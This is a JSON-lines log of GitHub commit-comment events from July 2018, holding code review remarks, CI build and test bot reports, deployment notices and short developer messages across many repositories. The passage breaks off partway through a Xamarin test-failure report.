{"id":"7926537671","type":"CommitCommentEvent","actor":{"login":"exodrifter"},"repo":{"name":"exodrifter/unity-python"},"payload":{"comment":{"id":29615991,"position":11,"line":11,"path":"Scripts/UnityPython.cs","commit_id":"f864edb51f2a4f8c5ae2cf77e2c28df540bd6f37","created_at":"2018-07-06T02:46:20Z","updated_at":"2018-07-06T02:46:20Z","author_association":"OWNER","body":"You don't _need_ to, but this allows us to access Unity's API from our python scripts at runtime."}},"created_at":"2018-07-06T02:46:20Z"}
{"id":"7926538571","type":"CommitCommentEvent","actor":{"login":"nodecaiBird"},"repo":{"name":"nodecaiBird/DataContainer"},"payload":{"comment":{"id":29615993,"position":null,"line":null,"path":null,"commit_id":"bcab81ea98b0aa9a70aa1d1eb296cdaae26bcbbe","created_at":"2018-07-06T02:46:40Z","updated_at":"2018-07-06T02:46:40Z","author_association":"OWNER","body":"Data.js文件是一个数据容器，DataContainer是用来管理数据的代码，使用可看测试代码"}},"created_at":"2018-07-06T02:46:40Z"}
{"id":"7926539647","type":"CommitCommentEvent","actor":{"login":"checho07"},"repo":{"name":"checho07/AppCun_V2"},"payload":{"comment":{"id":29615997,"position":null,"line":null,"path":null,"commit_id":"7972b8fdaa332d77ece5f06952fcbae10b32bbb3","created_at":"2018-07-06T02:47:07Z","updated_at":"2018-07-06T02:47:07Z","author_association":"OWNER","body":"commit footer2"}},"created_at":"2018-07-06T02:47:07Z"}
{"id":"7926540841","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29615999,"position":null,"line":null,"path":null,"commit_id":"3a7c2c8cbc926ccc1b1356772ab0df267532f123","created_at":"2018-07-06T02:47:38Z","updated_at":"2018-07-06T02:47:38Z","author_association":"NONE","body":"179D_Reporting-v8.8.0 (Myoldmopar) - Win64-Windows-7-VisualStudio-14: OK (2932 of 2932 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3a7c2c8cbc926ccc1b1356772ab0df267532f123-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3a7c2c8cbc926ccc1b1356772ab0df267532f123-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-06T02:47:38Z"}
{"id":"7926544405","type":"CommitCommentEvent","actor":{"login":"qgustavor"},"repo":{"name":"qgustavor/fansubdb"},"payload":{"comment":{"id":29616007,"position":null,"line":null,"path":null,"commit_id":"ae98803d64aab9278200510050e3676bd3e8e431","created_at":"2018-07-06T02:49:07Z","updated_at":"2018-07-06T02:49:07Z","author_association":"OWNER","body":"No, I'm not going to rebase just to fix this mess.\r\nPlease. No.\r\nAnyone reading the RSS fead: ignore it."}},"created_at":"2018-07-06T02:49:07Z"}
{"id":"7926547585","type":"CommitCommentEvent","actor":{"login":"pranav-patil"},"repo":{"name":"pranav-patil/spring-microservices"},"payload":{"comment":{"id":29616013,"position":14,"line":14,"path":"config-service/src/main/java/com/emprovise/service/configserver/WebSecurityConfiguration.java","commit_id":"e09f1ff26b7f4f402270b34b146ec1f0f6cc36f9","created_at":"2018-07-06T02:50:24Z","updated_at":"2018-07-06T02:50:24Z","author_association":"OWNER","body":"Without disabling the CSRF token calling `/encrypt` service on spring config server returns **403 Forbidden**. Since CSRF cannot be disabled using spring boot properties we are forced to extend WebSecurityConfigurerAdapter."}},"created_at":"2018-07-06T02:50:24Z"}
{"id":"7926548117","type":"CommitCommentEvent","actor":{"login":"billpine"},"repo":{"name":"melimore86/Data"},"payload":{"comment":{"id":29616018,"position":null,"line":null,"path":null,"commit_id":"6ea0d35688924248de32e62cc62351ebcbec8069","created_at":"2018-07-06T02:50:37Z","updated_at":"2018-07-06T02:50:37Z","author_association":"NONE","body":"I read over your Word document. Interesting that Dan thinks to move from the merged csv into a database then.  We do have Andre Breton with Insight Database Design working with us on other projects (large Gulf sturgeon project 40+ years of tagging data from several thousand fish and 20 different data collection teams) but he is an Access and VB developer.  "}},"created_at":"2018-07-06T02:50:37Z"}
{"id":"7926551202","type":"CommitCommentEvent","actor":{"login":"jmellorcrummey"},"repo":{"name":"HPCToolkit/hpctoolkit"},"payload":{"comment":{"id":29616022,"position":null,"line":null,"path":null,"commit_id":"3385f1468bc1a477acbaf8002cb25075ed945b21","created_at":"2018-07-06T02:51:53Z","updated_at":"2018-07-06T02:51:53Z","author_association":"MEMBER","body":"I don't understand the code below. You put the td into the thread manager even if it is not a compact thread. For a non-compact thread, you quit after you put td into the queue. By putting it into the queue,  you may reuse it as if it were a compact thread. However, you don't put markers around the trace data because that happens after you return.\r\n\r\n\r\n```\r\n// case 1: for compact and non-compact threads:\r\n// save the data in the queue. We may reuse again later.\r\n//  call hpcrun_threadMgr_data_put() to finalize the thread\r\n// writing the profile will be performed later in hpcrun_fini_internal\r\n//  if it's a compact thread, we write the profile data\r\n// unless there's a shutdown or cancellation, we need to write the\r\n//  otherwise we enqueue the data to the list\r\n//  the profile here\t\t\r\n  \t\t  \r\n      thread_data_t* td = hpcrun_get_thread_data();\t\t      \r\n      hpcrun_threadMgr_data_put(td);\t\t      \r\n  \t\t  \r\n      if (hpcrun_threadMgr_compact_thread() == OPTION_NO_COMPACT_THREAD) {\t\t    \t\t        \r\n         return;\r\n      }\t\t      \r\n```"}},"created_at":"2018-07-06T02:51:53Z"}
{"id":"7926552442","type":"CommitCommentEvent","actor":{"login":"pranav-patil"},"repo":{"name":"pranav-patil/spring-microservices"},"payload":{"comment":{"id":29616024,"position":16,"line":17,"path":"config-service/src/main/resources/application.yml","commit_id":"e09f1ff26b7f4f402270b34b146ec1f0f6cc36f9","created_at":"2018-07-06T02:52:24Z","updated_at":"2018-07-06T02:52:24Z","author_association":"OWNER","body":"The [Spring Boot 2.0.1 Release common application properties](https://docs.spring.io/spring-boot/docs/2.0.1.RELEASE/reference/html/common-application-properties.html) specifies all the spring boot properties including `spring.security.basic.enabled`."}},"created_at":"2018-07-06T02:52:24Z"}
{"id":"7926555597","type":"CommitCommentEvent","actor":{"login":"zhangyue2030"},"repo":{"name":"zhangyue2030/PycharmProject"},"payload":{"comment":{"id":29616029,"position":4,"line":4,"path":"README.md","commit_id":"a6200ebc162c53a6eff7ea2172bd11e6a0fc2de9","created_at":"2018-07-06T02:53:43Z","updated_at":"2018-07-06T02:53:43Z","author_association":"OWNER","body":"此项目是为了备份Pycharm的学习及实验代码，cookie等敏感信息已经用“xxx”代替"}},"created_at":"2018-07-06T02:53:43Z"}
{"id":"7926563974","type":"CommitCommentEvent","actor":{"login":"tuananh97"},"repo":{"name":"devtuananh/sample_app"},"payload":{"comment":{"id":29616038,"position":null,"line":null,"path":null,"commit_id":"920d20d163ddca2d0e3d888f81f8b5a4fed65263","created_at":"2018-07-06T02:57:06Z","updated_at":"2018-07-06T02:57:06Z","author_association":"NONE","body":"Abc"}},"created_at":"2018-07-06T02:57:06Z"}
{"id":"7926563988","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29616039,"position":null,"line":null,"path":null,"commit_id":"819fc522f706d8a6b6f7eadafbcf5294b0dd7f0e","created_at":"2018-07-06T02:57:07Z","updated_at":"2018-07-06T02:57:07Z","author_association":"OWNER","body":"One guess: you have new (local) files that are now sitting in the wrong directory with respect to the new hierarchy. So they are not found."}},"created_at":"2018-07-06T02:57:07Z"}
{"id":"7926566514","type":"CommitCommentEvent","actor":{"login":"GuilhermeVicentin"},"repo":{"name":"GuilhermeVicentin/Petshop"},"payload":{"comment":{"id":29616041,"position":null,"line":null,"path":null,"commit_id":"12b1b8e4649a32d70fa775143a69b78a0d69a4ac","created_at":"2018-07-06T02:58:10Z","updated_at":"2018-07-06T02:58:10Z","author_association":"OWNER","body":"Ok cool"}},"created_at":"2018-07-06T02:58:10Z"}
{"id":"7926566575","type":"CommitCommentEvent","actor":{"login":"summer095"},"repo":{"name":"summer095/summer5"},"payload":{"comment":{"id":29616042,"position":null,"line":null,"path":null,"commit_id":"3778a8cc670519df362c0eda8927389ac3c226e6","created_at":"2018-07-06T02:58:11Z","updated_at":"2018-07-06T02:58:11Z","author_association":"OWNER","body":"hello word"}},"created_at":"2018-07-06T02:58:11Z"}
{"id":"7926567017","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29616043,"position":null,"line":null,"path":null,"commit_id":"6c7531ea10c5afa5ef04487def2c5772a1a5d480","created_at":"2018-07-06T02:58:20Z","updated_at":"2018-07-06T02:58:20Z","author_association":"NONE","body":"#6599-HVACAirloopUnitarySystem-does-not-honor-continuous-fan-mode-using-multispeed-heating-coil (rraustad) - x86_64-MacOS-10.9-clang: OK (2933 of 2933 tests passed, 8 test warnings)\n\nMessages:\n\n * 8 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6c7531ea10c5afa5ef04487def2c5772a1a5d480-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6c7531ea10c5afa5ef04487def2c5772a1a5d480-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-06T02:58:20Z"}
{"id":"7926569131","type":"CommitCommentEvent","actor":{"login":"prudhomm"},"repo":{"name":"feelpp/feelpp"},"payload":{"comment":{"id":29616046,"position":9,"line":186,"path":"contrib/ginac/ginac/CMakeLists.txt","commit_id":"c566e7e11f10772ecdc052920a7b73b39349e079","created_at":"2018-07-06T02:59:13Z","updated_at":"2018-07-06T02:59:13Z","author_association":"MEMBER","body":" not stated: http://docs.feelpp.org/user/0.104/install/prerequisites-dev/"}},"created_at":"2018-07-06T02:59:13Z"}
{"id":"7930692394","type":"CommitCommentEvent","actor":{"login":"erlinux"},"repo":{"name":"erlinux/lctt-cli"},"payload":{"comment":{"id":29625703,"position":null,"line":null,"path":null,"commit_id":"86be96fa59593a3eb9cdf53fc13771bff40c46a6","created_at":"2018-07-06T20:00:09Z","updated_at":"2018-07-06T20:00:09Z","author_association":"OWNER","body":"git reset COMMIT --hard 删除commit\r\n\r\ngit rebase -i COMMIT 切换到commit\r\ngit rebase -i HEAD^ 内部切换上层\r\n\r\ngit commit --amend 修改COMMIT编号\r\ngit rebase --continue 回归master\r\n\r\nvim\r\namend\r\ncontinue -> need update\r\n..git stash pop..\r\namend\r\ncontinue\r\n...-f\r\n"}},"created_at":"2018-07-06T20:00:09Z"}
{"id":"7930697933","type":"CommitCommentEvent","actor":{"login":"yeltnar"},"repo":{"name":"yeltnar/ws-expose-server"},"payload":{"comment":{"id":29625718,"position":null,"line":null,"path":null,"commit_id":"e25c81c8201dfb4015046a37e3f7ba4b6b44af7c","created_at":"2018-07-06T20:01:33Z","updated_at":"2018-07-06T20:01:33Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/8839f9f8-ee5d-429f-8749-52267c653952?env_id=ibm%3Ayp%3Aus-south \"ws-expose\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/5c41e84d-5968-4649-8c7b-52afb41b0a6e?env_id=ibm%3Ayp%3Aus-south \"ws-expose-pipeline\") deployed [ws-expose-server](https://github.com/yeltnar/ws-expose-server/releases/tag/deploy-ibm-yp-us-south-andcbrant-gmail.com-dev-20180706-200132 \"deploy-ibm-yp-us-south-andcbrant-gmail.com-dev-20180706-200132\") to [dev](https://console.bluemix.net/apps/e68f5516-a561-42c7-ac49-af54fea27ed3?env_id=ibm:yp:us-south \"ibm:yp:us-south:andcbrant@gmail.com:dev\"), including this commit"}},"created_at":"2018-07-06T20:01:33Z"}
{"id":"7930699225","type":"CommitCommentEvent","actor":{"login":"mattberther"},"repo":{"name":"winstonjs/winston-daily-rotate-file"},"payload":{"comment":{"id":29625724,"position":4,"line":153,"path":"daily-rotate-file.js","commit_id":"3d8674f340632c4422eaf2dbc31a80107f7bdd6a","created_at":"2018-07-06T20:01:53Z","updated_at":"2018-07-06T20:01:53Z","author_association":"CONTRIBUTOR","body":"Sure - it'd be a starting point. We could expand the scope to other fields, if necessary."}},"created_at":"2018-07-06T20:01:53Z"}
{"id":"7930703430","type":"CommitCommentEvent","actor":{"login":"benjaoming"},"repo":{"name":"learningequality/kolibri"},"payload":{"comment":{"id":29625731,"position":172,"line":4349,"path":"yarn.lock","commit_id":"883795a867d681dbea8756649c7fe8c84fca44de","created_at":"2018-07-06T20:03:02Z","updated_at":"2018-07-06T20:03:02Z","author_association":"MEMBER","body":"Ah okay :) I'm maybe not that up2date on how these lock files work, thanks for explaining! When resolving the diff, it's pretty hard to figure out whether such new lines should replace another line or not. Better to ask :)"}},"created_at":"2018-07-06T20:03:02Z"}
{"id":"7930708864","type":"CommitCommentEvent","actor":{"login":"genrym"},"repo":{"name":"etorreborre/specs2"},"payload":{"comment":{"id":29625740,"position":63,"line":63,"path":"guide/src/test/scala/org/specs2/guide/AddKeywords.scala","commit_id":"2fdbc7664d918e48b5f0d6b25ad576d09ff303bb","created_at":"2018-07-06T20:04:33Z","updated_at":"2018-07-06T20:04:33Z","author_association":"NONE","body":"typo: should be _used_"}},"created_at":"2018-07-06T20:04:33Z"}
{"id":"7930710534","type":"CommitCommentEvent","actor":{"login":"abuailaf"},"repo":{"name":"abuailaf/-"},"payload":{"comment":{"id":29625743,"position":null,"line":null,"path":null,"commit_id":"6f41d74f2b00f057e03186e16d5623721f3a1e3e","created_at":"2018-07-06T20:05:01Z","updated_at":"2018-07-06T20:05:01Z","author_association":"OWNER","body":"مساء الورد على الجميع\r\nانا توي بالبرنامج وماني عارف شي توي بديت فيه اتمنا التواصل والمساعدة من الجميع"}},"created_at":"2018-07-06T20:05:01Z"}
{"id":"7930711069","type":"CommitCommentEvent","actor":{"login":"peff"},"repo":{"name":"telezhnaya/git"},"payload":{"comment":{"id":29625745,"position":118,"line":877,"path":"ref-filter.c","commit_id":"2f84f2c663ab1aabe4186ff9d4e9b33b0b8fefce","created_at":"2018-07-06T20:05:09Z","updated_at":"2018-07-06T20:05:09Z","author_association":"NONE","body":"I think these aren't currently freed, which is a leak present in the existing code before these patches. If you run `valgrind git for-each-ref`, for example, you can see a lot of leakage. I think these need to be dealt with _eventually_, because tools like `cat-file` print a lot more than `for-each-ref` (think one leak per object versus one leak per ref; there are a lot more objects). But in the short-term, as long as we are not making things too much worse, it's probably OK to gloss over it for now."}},"created_at":"2018-07-06T20:05:09Z"}
{"id":"7930716430","type":"CommitCommentEvent","actor":{"login":"jacobemcken"},"repo":{"name":"taisph/laravel-opentracing"},"payload":{"comment":{"id":29625752,"position":27,"line":27,"path":"src/LocalScope.php","commit_id":"badd4e37d876c5ab5501a9cd345f575e85cacff7","created_at":"2018-07-06T20:06:31Z","updated_at":"2018-07-06T20:06:31Z","author_association":"NONE","body":"I think you are using `{@inheritdoc}` wrongly, thought it might be PHP Storm that is pulling your leg:\r\n\r\nhttps://stackoverflow.com/questions/26550745/correct-syntax-for-inheritdoc-in-phpdocumentor"}},"created_at":"2018-07-06T20:06:31Z"}
{"id":"7930718495","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29625757,"position":null,"line":null,"path":null,"commit_id":"1609c221f3f8ef3ac481fdb5c165b342d4f0de54","created_at":"2018-07-06T20:07:05Z","updated_at":"2018-07-06T20:07:05Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#pr-af-loons](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#pr-af-loons).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-af-loons-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-06T20:07:05Z"}
{"id":"7930719854","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29625763,"position":null,"line":null,"path":null,"commit_id":"96453da376142f7fd25a41ba8ea15e9964138a5f","created_at":"2018-07-06T20:07:26Z","updated_at":"2018-07-06T20:07:26Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#pr-af-loons](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#pr-af-loons).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-af-loons-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-06T20:07:26Z"}
{"id":"7930720606","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29625765,"position":null,"line":null,"path":null,"commit_id":"01565d561515c82c11b0625ada271de17f350807","created_at":"2018-07-06T20:07:38Z","updated_at":"2018-07-06T20:07:38Z","author_association":"OWNER","body":"Note that none of the other packages will use this version of `drasil-lang` until their dependencies are updated to require 0.1.3."}},"created_at":"2018-07-06T20:07:38Z"}
{"id":"7930721900","type":"CommitCommentEvent","actor":{"login":"garettarrowood"},"repo":{"name":"learn-co-curriculum/phrg-strong-params-basics"},"payload":{"comment":{"id":29625768,"position":null,"line":null,"path":null,"commit_id":"8c42ae4dcd67944c58e24604c5237b66b240f84d","created_at":"2018-07-06T20:07:59Z","updated_at":"2018-07-06T20:07:59Z","author_association":"MEMBER","body":"@perpepajn25 - Why is the `Gemfile.lock` removed from so many of these labs? I'm having to go through them and add it back with my `phrg-` version of the curriculum so my students stop running into dependency errors. \r\n\r\nI had my students download the most recent version of Rails at the start of class and we ran into a bunch of trouble in the Sinatra labs because of syntax changes with `ActiveRecord` 4.2.x vs 5.1.x. "}},"created_at":"2018-07-06T20:07:59Z"}
{"id":"7930724050","type":"CommitCommentEvent","actor":{"login":"frankhu-optimizely"},"repo":{"name":"optimizely/tcollector"},"payload":{"comment":{"id":29625775,"position":24,"line":23,"path":"collectors/30/api_http_v2.py","commit_id":"b0ad3904e43156eb0d397a4fcb2ffa10061b4257","created_at":"2018-07-06T20:08:33Z","updated_at":"2018-07-06T20:08:33Z","author_association":"NONE","body":"can use `match` if `results-` wont appear in the middle of strings"}},"created_at":"2018-07-06T20:08:33Z"}
{"id":"7930724485","type":"CommitCommentEvent","actor":{"login":"Jumblemuddle"},"repo":{"name":"awsdocs/aws-codepipeline-user-guide"},"payload":{"comment":{"id":29625777,"position":null,"line":null,"path":null,"commit_id":"d43bf53a6635f0bde7dbc648f8b3ed685302da4f","created_at":"2018-07-06T20:08:40Z","updated_at":"2018-07-06T20:08:40Z","author_association":"NONE","body":"@darlaker What version was this released in? It doesn't seem to be in 1.15.10."}},"created_at":"2018-07-06T20:08:40Z"}
{"id":"7930741233","type":"CommitCommentEvent","actor":{"login":"melimore86"},"repo":{"name":"melimore86/Data"},"payload":{"comment":{"id":29625804,"position":null,"line":null,"path":null,"commit_id":"6ea0d35688924248de32e62cc62351ebcbec8069","created_at":"2018-07-06T20:12:58Z","updated_at":"2018-07-06T20:12:58Z","author_association":"OWNER","body":"Access could work. Dan said Zenodo as a database storage. Katie says that she usually used the Rcurl in R and makes sure that the .csv in her repository is always up to date. I believe either way would work, and a database for this data, since it's not soo many observations and not always collected, can be in a database. But working with Rcurl is just as easy. I think I'll write a list of pros and cons to see which is the best way for our project to continue. "}},"created_at":"2018-07-06T20:12:58Z"}
{"id":"7930754477","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29625821,"position":null,"line":null,"path":null,"commit_id":"30c2c454c36a33ca351d9f717a29210b25671bd4","created_at":"2018-07-06T20:16:13Z","updated_at":"2018-07-06T20:16:13Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-06T20:16:13Z"}
{"id":"7930758185","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29625825,"position":null,"line":null,"path":null,"commit_id":"1d7bc58ca29211a16339cda7dd16886c484276f7","created_at":"2018-07-06T20:17:17Z","updated_at":"2018-07-06T20:17:17Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#ci-423](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#ci-423).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-423-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-06T20:17:17Z"}
{"id":"7930769374","type":"CommitCommentEvent","actor":{"login":"luminosamaz"},"repo":{"name":"LuminosoInsight/luminoso-api-client-python"},"payload":{"comment":{"id":29625839,"position":null,"line":null,"path":null,"commit_id":"4f87674f3e636700c14b74ac3d1e9d94319df25f","created_at":"2018-07-06T20:20:03Z","updated_at":"2018-07-06T20:20:03Z","author_association":"NONE","body":"Regardless of whether one approves of the format change, the old `token_dict.get()` code would never raise a KeyError..."}},"created_at":"2018-07-06T20:20:03Z"}
{"id":"7930770697","type":"CommitCommentEvent","actor":{"login":"Pinacolada64"},"repo":{"name":"Pinacolada64/ImageBBS"},"payload":{"comment":{"id":29625843,"position":null,"line":null,"path":null,"commit_id":"69ec3d3316d958b615fffb3c3c8f25c9a9424397","created_at":"2018-07-06T20:20:25Z","updated_at":"2018-07-06T20:20:25Z","author_association":"OWNER","body":"\"++ copier\" does this."}},"created_at":"2018-07-06T20:20:25Z"}
{"id":"7930777838","type":"CommitCommentEvent","actor":{"login":"vanpariyar"},"repo":{"name":"vanpariyar/vanpariyar.github.io"},"payload":{"comment":{"id":29625855,"position":null,"line":null,"path":null,"commit_id":"9cbafcc8777aabe9a40a9c02c5f5440c9a269ec8","created_at":"2018-07-06T20:22:09Z","updated_at":"2018-07-06T20:22:09Z","author_association":"OWNER","body":"ok"}},"created_at":"2018-07-06T20:22:09Z"}
{"id":"7930804300","type":"CommitCommentEvent","actor":{"login":"shefty"},"repo":{"name":"yburette/libfabric"},"payload":{"comment":{"id":29625909,"position":78,"line":299,"path":"prov/mrail/src/mrail.h","commit_id":"69e76689081e2d11f7a02d190a32e2c476679237","created_at":"2018-07-06T20:28:36Z","updated_at":"2018-07-06T20:28:36Z","author_association":"NONE","body":"Wouldn't remote_addr be better in the subreq structure?"}},"created_at":"2018-07-06T20:28:36Z"}
{"id":"7930809131","type":"CommitCommentEvent","actor":{"login":"Gama11"},"repo":{"name":"ciscoheat/immutable-hx"},"payload":{"comment":{"id":29625916,"position":28,"line":27,"path":"src/immutable/BuildImmutableClass.hx","commit_id":"6b79e6a132237a11cd736566bc4a16d6a9e56361","created_at":"2018-07-06T20:29:55Z","updated_at":"2018-07-06T20:29:55Z","author_association":"NONE","body":"I think you could just check `haxe_ver` the regular way, since there's no way for that to be different in macro context and regular compilation?\r\n\r\n````\r\n#if (haxe_ver < \"4.0.0\")\r\n```"}},"created_at":"2018-07-06T20:29:55Z"}
{"id":"7930810064","type":"CommitCommentEvent","actor":{"login":"malahal"},"repo":{"name":"sachinpunadikar/nfs-ganesha"},"payload":{"comment":{"id":29625920,"position":20,"line":348,"path":"src/include/abstract_mem.h","commit_id":"b8a566c86dd62d46d5b56aaa336742158d4373c9","created_at":"2018-07-06T20:30:11Z","updated_at":"2018-07-06T20:30:11Z","author_association":"NONE","body":"We could put these in a linked list as an enhancement."}},"created_at":"2018-07-06T20:30:11Z"}
{"id":"7930811254","type":"CommitCommentEvent","actor":{"login":"shefty"},"repo":{"name":"yburette/libfabric"},"payload":{"comment":{"id":29625925,"position":128,"line":349,"path":"prov/mrail/src/mrail.h","commit_id":"69e76689081e2d11f7a02d190a32e2c476679237","created_at":"2018-07-06T20:30:28Z","updated_at":"2018-07-06T20:30:28Z","author_association":"NONE","body":"I think I would use the terms 'alloc' and 'free' in place of push/pop in the above function calls."}},"created_at":"2018-07-06T20:30:28Z"}
{"id":"7930813571","type":"CommitCommentEvent","actor":{"login":"Mouvedia"},"repo":{"name":"LightTable/LightTable"},"payload":{"comment":{"id":29625934,"position":null,"line":null,"path":null,"commit_id":"f18ab2183b11dd79e52475853344322403c2429d","created_at":"2018-07-06T20:31:04Z","updated_at":"2018-07-06T20:31:04Z","author_association":"CONTRIBUTOR","body":"@simon-brooke https://www.reddit.com/r/Clojure/comments/8wafyt/ann_light_table_seeks_new_maintainers/"}},"created_at":"2018-07-06T20:31:04Z"}
{"id":"7930815356","type":"CommitCommentEvent","actor":{"login":"malahal"},"repo":{"name":"sachinpunadikar/nfs-ganesha"},"payload":{"comment":{"id":29625939,"position":9,"line":216,"path":"src/include/server_stats_private.h","commit_id":"b8a566c86dd62d46d5b56aaa336742158d4373c9","created_at":"2018-07-06T20:31:31Z","updated_at":"2018-07-06T20:31:31Z","author_association":"NONE","body":"Let us have object size from the pool_t structure as well."}},"created_at":"2018-07-06T20:31:31Z"}
{"id":"7930816220","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29625945,"position":null,"line":null,"path":null,"commit_id":"b48f169a40bd467619304a3ef564a421435aa852","created_at":"2018-07-06T20:31:43Z","updated_at":"2018-07-06T20:31:43Z","author_association":"NONE","body":"#6598-FanSystemModel-crashes-using-Continuous-speed-control-method (rraustad) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2313 of 2313 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b48f169a40bd467619304a3ef564a421435aa852-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b48f169a40bd467619304a3ef564a421435aa852-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b48f169a40bd467619304a3ef564a421435aa852-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.19%25-green.png)</a>\n"}},"created_at":"2018-07-06T20:31:43Z"}
{"id":"7930816623","type":"CommitCommentEvent","actor":{"login":"xamarin-release-manager"},"repo":{"name":"xamarin/xamarin-macios"},"payload":{"comment":{"id":29625947,"position":null,"line":null,"path":null,"commit_id":"6c06b962ab6694cf7c9dd267e844436f3124dc4f","created_at":"2018-07-06T20:31:51Z","updated_at":"2018-07-06T20:31:51Z","author_association":"COLLABORATOR","body":"🔥 [Jenkins job](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/77/display/redirect) (on internal Jenkins) failed in stage 'Test run' 🔥 : hudson.AbortException: script returned exit code 2\n\n✅ [Build succeeded](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/77//console)\n✅ [API Diff (from stable)](http://xamarin-storage/jenkins/xamarin-macios/xcode10/6c06b962ab6694cf7c9dd267e844436f3124dc4f/77/jenkins-results/api-diff/index.html)\n✅ [API Diff (from PR only)](http://xamarin-storage/jenkins/xamarin-macios/xcode10/6c06b962ab6694cf7c9dd267e844436f3124dc4f/77/jenkins-results/apicomparison/index.html) (please review changes)\n✅ [Generator Diff](http://xamarin-storage/jenkins/xamarin-macios/xcode10/6c06b962ab6694cf7c9dd267e844436f3124dc4f/77/jenkins-results/generator-diff/index.html) (please review changes)\n🔥 [Test run failed](http://xamarin-storage/jenkins/xamarin-macios/xcode10/6c06b962ab6694cf7c9dd267e844436f3124dc4f/77/jenkins-results/tests/index.html) 🔥\n\n# Test results\n\n150 tests failed, 11 tests passed.\n\n## Failed tests\n\n * monotouch-test/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * framework-test/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * mini/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * interdependent-binding-projects/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * fsharp/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * mscorlib/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Core/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Data/iOS 